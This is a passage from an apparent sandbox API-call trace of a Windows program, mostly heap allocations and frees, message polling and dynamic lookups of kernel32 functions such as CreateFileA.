hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0040.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0040.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0040.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0040.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0040.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5810 | out: hHeap=0x770000) returned 1 [0040.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0040.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0040.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0040.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0040.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0040.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0040.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0040.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0040.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0040.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0040.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0040.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0040.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0040.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0040.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0040.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0040.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0040.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0040.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0040.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0040.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0040.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0040.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0040.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0040.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0040.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0040.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0040.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0040.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0040.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0040.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0040.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0040.321] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0040.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0040.321] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0040.321] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0040.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0040.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0040.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0040.321] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0040.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0040.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0040.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0040.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af568 [0040.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0040.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0040.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0040.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0040.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0040.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0040.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0040.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c8f8 [0040.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0040.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0040.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0040.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0040.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0040.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0040.321] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0040.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0040.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0040.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0040.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0040.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0040.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0040.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0040.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0040.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0040.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0040.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0040.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0040.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0040.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0040.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0040.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0040.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0040.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0040.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0040.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0040.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0040.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0040.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0040.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0040.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0040.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0040.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0040.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0040.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0040.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0040.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0040.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0040.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0040.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0040.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0040.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0040.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0040.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0040.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0040.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0040.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0040.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0040.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0040.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0040.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0040.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0040.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0040.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0040.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0040.324] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0040.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0040.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0040.324] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0040.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0040.324] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0040.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0040.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0040.324] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0040.324] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0040.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0040.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0040.324] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0040.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0040.324] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0040.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0040.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0040.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0040.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0040.324] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0040.324] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0040.324] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0040.324] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0040.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0040.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0040.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0040.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0040.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0040.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0040.325] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0040.325] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0040.325] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0040.325] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0040.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0040.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0040.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0040.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0040.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0040.325] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0040.325] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0040.325] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0040.325] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0040.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0040.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0040.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0040.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0040.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0040.325] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0040.325] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0040.325] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0040.325] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0040.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0040.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0040.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0040.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0040.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0040.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0040.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0040.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0040.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0040.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0040.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0040.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0040.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0040.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0040.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0040.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0040.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0040.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0040.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0040.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0040.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0040.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0040.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0040.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0040.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0040.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0040.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0040.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0040.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0040.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0040.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0040.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0040.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0040.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0040.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0040.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0040.327] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0040.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0040.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0040.327] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0040.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88cbf8 [0040.327] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88cbf8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0040.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0040.327] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0040.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0040.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0040.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0040.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0040.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0040.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0040.327] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0040.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cbf8 [0040.327] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88cbf8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0040.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0040.327] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0040.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0040.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0040.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0040.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0040.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0040.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0040.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0040.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0040.328] RtlAllocateHeap 